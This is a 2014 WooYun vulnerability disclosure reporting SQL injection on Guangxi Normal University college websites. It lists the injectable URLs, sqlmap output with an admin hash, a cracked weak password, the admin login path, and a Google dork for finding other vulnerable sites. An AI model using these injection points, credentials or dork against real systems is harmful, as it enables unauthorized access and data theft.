当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071182

漏洞标题:广西师范大学某学院注入,外加一些低版本的通用注入

相关厂商:CCERT教育网应急响应组

漏洞作者: phantomer

提交时间:2014-08-06 10:40

修复时间:2014-09-20 10:42

公开时间:2014-09-20 10:42

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-06: 细节已通知厂商并且等待厂商处理中
2014-08-08: 厂商已经确认,细节仅向厂商公开
2014-08-18: 细节向核心白帽子及相关领域专家公开
2014-08-28: 细节向普通白帽子公开
2014-09-07: 细节向实习白帽子公开
2014-09-20: 细节向公众公开

简要描述:

我是来求邀请码的。上次提交的几个漏洞都被插队了。

详细说明:

1.注入点:http://www.wlxy.gxnu.edu.cn/show.asp?ArticleID=1276
广西师范大学的文旅学院存在sqli漏洞。
sqlmap注入出来结果。

2.jpg


3.jpg

34.jpg


[22:16:01] [INFO] retrieved: ???|182821410@qq.com
[22:17:10] [INFO] retrieved: wlxy
[22:17:24] [INFO] retrieved: 80
[22:17:32] [INFO] retrieved: <P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ????
[22:20:12] [INFO] retrieved: 475c678b1dcb4ae2


username:wlxy
password:475c678b1dcb4ae2(解密后wlxy123,还是弱密码)
还泄露了邮箱。
找到后台,http://www.wlxy.gxnu.edu.cn/wlxy_Admin.asp(ps 后台结合社会工程学就太好猜了。)

QQ截图20140805222305.jpg


成功登入后台。

111.jpg


目测了一下后台,貌似已经被插坏了。请尽快修复。
2.http://www.ci.gxnu.edu.cn/article/showdown.asp?soft_id=59
广西师大某学院注入点

QQ截图20140805212436.jpg


google:inurl:showdown.asp?soft_id=
找到大部分网站还在使用,可以注入。
如:http://www.fkxqw.cn/showdown.asp?soft_id=21等。

QQ截图20140805212744.jpg


漏洞证明:

sqlmap注入

[22:07:40] [INFO] retrieved: id
[22:07:40] [INFO] retrieved: username
[22:07:40] [INFO] retrieved: title
[22:07:40] [INFO] retrieved: password
[22:07:40] [INFO] retrieved: articleid
[22:07:40] [INFO] retrieved: content
[22:07:40] [INFO] retrieved: key
[22:07:41] [INFO] retrieved: editor
[22:07:41] [INFO] retrieved: author
[22:12:16] [INFO] retrieved: classid
[22:15:44] [INFO] retrieved: ?
[22:16:01] [INFO] retrieved: ???|182821410@qq.com
[22:17:10] [INFO] retrieved: wlxy
[22:17:24] [INFO] retrieved: 80
[22:17:32] [INFO] retrieved: <P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ????
[22:20:12] [INFO] retrieved: 475c678b1dcb4ae2
[22:20:51] [INFO] retrieved: wlxy
[22:23:19] [INFO] retrieved: ?
[22:23:37] [INFO] retrieved: ???|182821410@qq.com
[22:25:05] [INFO] retrieved: wlxy
[22:25:16] [INFO] retrieved: 80
[22:25:24] [INFO] retrieved: <P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ????
[22:27:57] [INFO] retrieved: 49ba59abbe56e057


2.jpg


3.jpg

34.jpg


QQ截图20140805222305.jpg


QQ截图20140805212436.jpg


QQ截图20140805212744.jpg


修复方案:

站长要有升级的意识。看我写的那么认真,这样应该能有个邀请码了吧。

版权声明:转载请注明来源 phantomer@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-08-08 10:27

厂商回复:

正在通知相关学校处理

最新状态:

暂无


漏洞评价:

评论